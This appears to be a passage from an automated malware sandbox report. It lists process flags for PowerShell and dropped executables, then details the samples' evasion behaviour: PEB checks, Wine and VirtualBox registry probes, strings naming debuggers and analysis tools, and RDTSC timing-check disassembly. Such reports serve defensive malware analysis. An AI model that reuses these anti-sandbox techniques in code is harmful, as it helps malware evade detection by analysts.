Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-12126
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_2-9861

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EBEA second address: A3EBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F423CC2AB16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4BE2 second address: BC4BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F423D327E26h 0x0000000a je 00007F423D327E26h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4BF5 second address: BC4C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F423CC2AB1Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4C04 second address: BC4C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4C0A second address: BC4C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F423CC2AB16h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4C18 second address: BC4C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F423D327E26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4C28 second address: BC4C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F423CC2AB29h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F423CC2AB24h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4C5E second address: BC4C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3AC8 second address: BC3ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3C1A second address: BC3C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jne 00007F423D327E26h 0x00000010 jo 00007F423D327E26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3C32 second address: BC3C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3DCF second address: BC3DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3DE3 second address: BC3DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3DE7 second address: BC3DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F423D327E26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3DF9 second address: BC3E42 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F423CC2AB16h 0x00000008 jmp 00007F423CC2AB23h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007F423CC2AB22h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007F423CC2AB26h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3E42 second address: BC3E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3FA5 second address: BC3FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB21h 0x00000007 jmp 00007F423CC2AB22h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F423CC2AB16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3FD6 second address: BC3FEA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F423D327E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F423D327E2Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3FEA second address: BC3FEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC4129 second address: BC412F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC412F second address: BC4133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC42BE second address: BC42E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F423D327E35h 0x00000008 jne 00007F423D327E26h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC42E7 second address: BC42EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC42EB second address: BC42F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6C99 second address: BC6CAB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F423CC2AB1Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6CAB second address: BC6CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6F58 second address: BC6F62 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F423CC2AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6F62 second address: BC6F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2F3423EFh 0x00000010 or edi, 69A11B00h 0x00000016 lea ebx, dword ptr [ebp+1245BA73h] 0x0000001c mov cl, 93h 0x0000001e mov dword ptr [ebp+122D2EBEh], ebx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jnc 00007F423D327E26h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6F9C second address: BC6FA6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F423CC2AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8097 second address: BD809B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA8DA5 second address: BA8DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE64D6 second address: BE64DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE64DC second address: BE64ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F423CC2AB16h 0x00000009 jns 00007F423CC2AB16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE64ED second address: BE650C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E36h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE650C second address: BE651A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE651A second address: BE6552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F423D327E26h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F423D327E32h 0x00000011 jmp 00007F423D327E38h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6552 second address: BE6558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6AC6 second address: BE6ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6ACA second address: BE6ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F423CC2AB1Ch 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6C3F second address: BE6C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E37h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F423D327E26h 0x0000000f jg 00007F423D327E26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6D9F second address: BE6DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6DA5 second address: BE6DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6DAB second address: BE6DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6DB1 second address: BE6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6DBA second address: BE6DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA568 second address: BDA56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA56E second address: BDA572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA572 second address: BDA5A0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F423D327E26h 0x00000008 jmp 00007F423D327E34h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F423D327E2Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA5A0 second address: BDA5BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007F423CC2AB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F423CC2AB1Ch 0x00000015 rdtsc
